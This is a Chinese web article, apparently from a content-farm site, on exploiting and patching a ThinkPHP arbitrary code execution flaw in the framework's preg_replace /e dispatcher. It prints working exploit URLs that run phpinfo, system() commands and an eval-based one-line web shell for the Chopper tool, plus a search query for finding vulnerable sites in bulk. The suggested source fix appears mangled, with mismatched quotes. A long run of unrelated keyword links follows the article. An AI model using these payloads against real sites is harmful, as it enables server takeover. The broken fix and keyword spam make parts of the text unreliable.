如何利用及修复ThinkPHP框架任意代码执行漏洞
发表于:2025-02-12 作者:千家信息网编辑
千家信息网最后更新 2025年02月12日,这篇文章主要讲解了"如何利用及修复ThinkPHP框架任意代码执行漏洞",文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习"如何利用及修复ThinkPHP框架
千家信息网最后更新 2025年02月12日如何利用及修复ThinkPHP框架任意代码执行漏洞
这篇文章主要讲解了"如何利用及修复ThinkPHP框架任意代码执行漏洞",文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习"如何利用及修复ThinkPHP框架任意代码执行漏洞"吧!
近期thinkphp框架爆出了一个任意代码执行漏洞,其危害性相当的高,漏洞利用方法如下:
index.php/module/aciton/param1/${@print(THINK_VERSION)} index.php/module/aciton/param1/${@function_all()}
其中的function_all代表任何函数,比如:
index.php/module/aciton/param1/${@phpinfo()}
就可以获取服务器的系统配置信息等。
index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al
可以列出网站文件列表
index.php/module/action/param1/{${eval($_POST[s])}}
就可以直接执行一句话代码,用菜刀直接连接.
这样黑客们就可以直接通过google批量搜索关键字:thinkphp intitle:系统发生错误 来获取更多使用thinkphp框架的网站列表。可见其危害性相当的大。
thinkphp框架执行任意代码漏洞修复方法:
用户可下载官方发布的补丁:
http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838
或者或者直接修改源码:
将/ThinkPHP/Lib/Core/Dispatcher.class.php文件中的
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
修改为:
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2';', implode($depr,$paths));
将preg_replace第二个参数中的双引号改为单引号,防止其中的php变量语法被解析执行。
感谢各位的阅读,以上就是"如何利用及修复ThinkPHP框架任意代码执行漏洞"的内容了,经过本文的学习后,相信大家对如何利用及修复ThinkPHP框架任意代码执行漏洞这一问题有了更深刻的体会,具体使用情况还需要大家实践验证。这里是,小编将为大家推送更多相关知识点的文章,欢迎关注!
代码
框架
漏洞
学习
内容
危害性
引号
文件
方法
更多
系统
网站
一句话
代表
信息
关键
关键字
函数
参数
变量
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
湖南工程软件开发哪家好
网络安全等保公司
考勤管理程序如何添加数据库
盐城市软件开发公司
循证医学summary数据库
服务器安全狗安全模式更新
寿县天气预报软件开发
三国志战略版各赛季服务器
2018网络技术学院排行榜
莱州安卓软件开发公司
2018青少年网络安全隐患
网络强国保障网络安全
方舟手游服务器里怎么请求恐龙
laravel数据库密码
python的数据库结构
网络技术毕业生简历
如何查看服务器mod饥荒
腾讯服务器教学
服务器崩了开不了游戏
公司社区软件开发
数据库查询中in的作用
自制数据库有啥用
cmd新建数据库的命令
应用软件开发免费
无线网络安全设置
新乡市云网互联网科技有限公司
网络安全法宣传题目及答案
通信服务器电源管理器
数据库关系的简写
软件开发一直不能入门